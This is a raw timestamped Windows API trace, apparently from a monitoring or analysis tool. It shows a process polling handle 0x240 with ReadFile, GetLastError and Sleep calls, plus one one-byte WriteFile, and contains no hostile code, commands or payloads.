	[0227.433] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.433] GetLastError () returned 0x218
	[0227.433] Sleep (dwMilliseconds=0xa) 
	[0227.449] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.449] GetLastError () returned 0x218
	[0227.449] Sleep (dwMilliseconds=0xa) 
	[0227.464] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.464] GetLastError () returned 0x218
	[0227.464] Sleep (dwMilliseconds=0xa) 
	[0227.480] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.480] GetLastError () returned 0x218
	[0227.481] Sleep (dwMilliseconds=0xa) 
	[0227.496] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.496] GetLastError () returned 0x218
	[0227.496] Sleep (dwMilliseconds=0xa) 
	[0227.511] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.511] GetLastError () returned 0x218
	[0227.511] Sleep (dwMilliseconds=0xa) 
	[0227.527] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.527] GetLastError () returned 0x218
	[0227.527] Sleep (dwMilliseconds=0xa) 
	[0227.543] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.543] GetLastError () returned 0x218
	[0227.543] Sleep (dwMilliseconds=0xa) 
	[0227.589] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.589] GetLastError () returned 0x218
	[0227.589] Sleep (dwMilliseconds=0xa) 
	[0227.636] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.636] GetLastError () returned 0x218
	[0227.637] Sleep (dwMilliseconds=0xa) 
	[0227.683] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.683] GetLastError () returned 0x218
	[0227.683] Sleep (dwMilliseconds=0xa) 
	[0227.698] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.698] GetLastError () returned 0x218
	[0227.699] Sleep (dwMilliseconds=0xa) 
	[0227.714] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.714] GetLastError () returned 0x218
	[0227.714] Sleep (dwMilliseconds=0xa) 
	[0227.729] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.729] GetLastError () returned 0x218
	[0227.730] Sleep (dwMilliseconds=0xa) 
	[0227.747] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.747] GetLastError () returned 0x218
	[0227.747] Sleep (dwMilliseconds=0xa) 
	[0227.761] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.761] GetLastError () returned 0x218
	[0227.761] Sleep (dwMilliseconds=0xa) 
	[0227.777] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.777] GetLastError () returned 0x218
	[0227.777] Sleep (dwMilliseconds=0xa) 
	[0227.792] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.792] GetLastError () returned 0x218
	[0227.792] Sleep (dwMilliseconds=0xa) 
	[0227.839] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.839] GetLastError () returned 0x218
	[0227.839] Sleep (dwMilliseconds=0xa) 
	[0227.886] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.886] GetLastError () returned 0x218
	[0227.886] Sleep (dwMilliseconds=0xa) 
	[0227.931] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.931] GetLastError () returned 0x218
	[0227.931] Sleep (dwMilliseconds=0xa) 
	[0227.938] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.938] GetLastError () returned 0x218
	[0227.938] Sleep (dwMilliseconds=0xa) 
	[0227.948] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.948] GetLastError () returned 0x218
	[0227.948] Sleep (dwMilliseconds=0xa) 
	[0227.964] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.964] GetLastError () returned 0x218
	[0227.964] Sleep (dwMilliseconds=0xa) 
	[0227.979] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.979] GetLastError () returned 0x218
	[0227.980] Sleep (dwMilliseconds=0xa) 
	[0227.996] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.996] GetLastError () returned 0x218
	[0227.996] Sleep (dwMilliseconds=0xa) 
	[0228.010] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.010] GetLastError () returned 0x218
	[0228.011] Sleep (dwMilliseconds=0xa) 
	[0228.026] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.026] GetLastError () returned 0x218
	[0228.026] Sleep (dwMilliseconds=0xa) 
	[0228.073] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.073] GetLastError () returned 0x218
	[0228.073] Sleep (dwMilliseconds=0xa) 
	[0228.105] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.105] GetLastError () returned 0x218
	[0228.105] Sleep (dwMilliseconds=0xa) 
	[0228.151] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.151] GetLastError () returned 0x218
	[0228.151] Sleep (dwMilliseconds=0xa) 
	[0228.166] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.166] GetLastError () returned 0x218
	[0228.166] Sleep (dwMilliseconds=0xa) 
	[0228.182] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.182] GetLastError () returned 0x218
	[0228.182] Sleep (dwMilliseconds=0xa) 
	[0228.198] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.198] GetLastError () returned 0x218
	[0228.198] Sleep (dwMilliseconds=0xa) 
	[0228.214] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.214] GetLastError () returned 0x218
	[0228.214] Sleep (dwMilliseconds=0xa) 
	[0228.229] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.229] GetLastError () returned 0x218
	[0228.229] Sleep (dwMilliseconds=0xa) 
	[0228.244] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.244] GetLastError () returned 0x218
	[0228.244] Sleep (dwMilliseconds=0xa) 
	[0228.260] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.260] GetLastError () returned 0x218
	[0228.260] Sleep (dwMilliseconds=0xa) 
	[0228.314] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.314] GetLastError () returned 0x218
	[0228.314] Sleep (dwMilliseconds=0xa) 
	[0228.354] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.354] GetLastError () returned 0x218
	[0228.354] Sleep (dwMilliseconds=0xa) 
	[0228.400] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.400] GetLastError () returned 0x218
	[0228.400] Sleep (dwMilliseconds=0xa) 
	[0228.443] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.443] GetLastError () returned 0x218
	[0228.443] Sleep (dwMilliseconds=0xa) 
	[0228.448] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.448] GetLastError () returned 0x218
	[0228.448] Sleep (dwMilliseconds=0xa) 
	[0228.464] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.464] GetLastError () returned 0x218
	[0228.464] Sleep (dwMilliseconds=0xa) 
	[0228.479] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.479] GetLastError () returned 0x218
	[0228.479] Sleep (dwMilliseconds=0xa) 
	[0228.495] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.495] GetLastError () returned 0x218
	[0228.495] Sleep (dwMilliseconds=0xa) 
	[0228.511] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.511] GetLastError () returned 0x218
	[0228.511] Sleep (dwMilliseconds=0xa) 
	[0228.666] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.666] GetLastError () returned 0x218
	[0228.666] Sleep (dwMilliseconds=0xa) 
	[0228.857] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.857] GetLastError () returned 0x218
	[0228.857] Sleep (dwMilliseconds=0xa) 
	[0228.914] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0228.914] GetLastError () returned 0x218
	[0228.914] Sleep (dwMilliseconds=0xa) 
	[0229.275] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0229.275] GetLastError () returned 0x218
	[0229.275] Sleep (dwMilliseconds=0xa) 
	[0229.290] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0229.290] GetLastError () returned 0x218
	[0229.290] Sleep (dwMilliseconds=0xa) 
	[0229.306] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0229.306] GetLastError () returned 0x218
	[0229.306] Sleep (dwMilliseconds=0xa) 
	[0229.324] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0229.324] GetLastError () returned 0x218
	[0229.324] Sleep (dwMilliseconds=0xa) 
	[0229.338] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0229.338] GetLastError () returned 0x218
	[0229.338] Sleep (dwMilliseconds=0xa) 
	[0229.353] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0229.353] GetLastError () returned 0x218
	[0229.353] Sleep (dwMilliseconds=0xa) 
	[0229.371] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0229.371] GetLastError () returned 0x218
	[0229.371] Sleep (dwMilliseconds=0xa) 
	[0229.385] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0229.385] GetLastError () returned 0x218
	[0229.385] Sleep (dwMilliseconds=0xa) 
	[0229.436] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0229.436] GetLastError () returned 0x218
	[0229.436] Sleep (dwMilliseconds=0xa) 
	[0229.478] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0229.478] GetLastError () returned 0x218
	[0229.478] Sleep (dwMilliseconds=0xa) 
	[0229.525] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0229.525] GetLastError () returned 0x218
	[0229.525] Sleep (dwMilliseconds=0xa) 
	[0229.540] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0229.540] GetLastError () returned 0x218
	[0229.540] Sleep (dwMilliseconds=0xa) 
	[0229.555] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0229.555] GetLastError () returned 0x218
	[0229.555] Sleep (dwMilliseconds=0xa) 
	[0229.571] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0229.571] GetLastError () returned 0x218
	[0229.571] Sleep (dwMilliseconds=0xa) 
	[0229.588] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0229.588] GetLastError () returned 0x218
	[0229.588] Sleep (dwMilliseconds=0xa) 
	[0229.602] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0229.602] GetLastError () returned 0x218
	[0229.602] Sleep (dwMilliseconds=0x3e8) 
	[0230.632] WriteFile (in: hFile=0x240, lpBuffer=0x108f208, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0) returned 0
	[0230.632] Sleep (dwMilliseconds=0xa) 
	[0230.647] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0230.647] GetLastError () returned 0x218
	[0230.647] Sleep (dwMilliseconds=0xa) 
	[0230.663] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0230.663] GetLastError () returned 0x218
	[0230.663] Sleep (dwMilliseconds=0xa) 
	[0230.683] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0230.684] GetLastError () returned 0x218
	[0230.684] Sleep (dwMilliseconds=0xa) 
	[0230.694] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0230.694] GetLastError () returned 0x218
	[0230.694] Sleep (dwMilliseconds=0xa) 
	[0230.709] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0230.709] GetLastError () returned 0x218
	[0230.709] Sleep (dwMilliseconds=0xa) 
	[0230.728] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0230.729] GetLastError () returned 0x218
	[0230.729] Sleep (dwMilliseconds=0xa) 
	[0230.741] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0230.741] GetLastError () returned 0x218
	[0230.741] Sleep (dwMilliseconds=0xa) 
	[0230.789] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0230.789] GetLastError () returned 0x218
	[0230.789] Sleep (dwMilliseconds=0xa) 
	[0230.835] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0230.835] GetLastError () returned 0x218
	[0230.835] Sleep (dwMilliseconds=0xa) 
	[0230.881] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0230.881] GetLastError () returned 0x218
	[0230.881] Sleep (dwMilliseconds=0xa) 
	[0230.897] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0230.897] GetLastError () returned 0x218
	[0230.897] Sleep (dwMilliseconds=0xa) 
	[0230.912] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0230.912] GetLastError () returned 0x218
	[0230.912] Sleep (dwMilliseconds=0xa) 
	[0230.928] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0230.928] GetLastError () returned 0x218
